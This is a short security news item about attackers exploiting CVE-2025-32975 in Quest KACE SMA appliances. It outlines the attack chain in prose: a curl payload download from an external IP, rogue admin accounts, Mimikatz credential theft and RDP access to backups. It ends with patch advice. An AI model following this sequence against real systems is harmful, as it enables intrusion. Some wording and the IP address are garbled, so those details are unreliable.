According to Arctic Wolf, attackers are suspected of exploiting a maximum severity security flaw affecting the Quest KACE Systems Management Appliance (SMA).
The cybersecurity firm said it observed malicious activity in customer environments starting the week of March 9, 2026, consistent with the exploitation of CVE-2025-32975 on unpatched SMA systems exposed to the internet. The ultimate goal of the attack is unknown at this time.
CVE-2025-32975 (CVSS score: 10.0) refers to an authentication bypass vulnerability that allows an attacker to impersonate a legitimate user without valid credentials. Successful exploitation of this flaw could facilitate complete takeover of administrative accounts. This issue was patched by Quest in May 2025.
In the malicious activity detected by Arctic Wolf, a threat actor is believed to have used this vulnerability to seize control of an administrative account and execute remote commands to drop a Base64-encoded payload from an external server (216.126.225).[.]156) Via the curl command.
The unknown attacker then proceeded to create additional administrative accounts via ‘runkbot.exe’, a background process associated with the SMA agent used to run scripts and manage installations. We also detected changes to the Windows registry via PowerShell scripts for possible persistence or system configuration changes.
Other actions taken by threat actors are listed below.
Perform credential collection using Mimikatz. Performs discovery and reconnaissance by enumerating logged in users and administrator accounts and running “net time” and “net group” commands. Obtain Remote Desktop Protocol (RDP) access to your backup infrastructure (Veeam, Veritas) and domain controllers.
To combat this threat, we recommend that administrators apply the latest updates and do not expose their SMA instances to the internet. This issue was resolved in versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4).
Source link
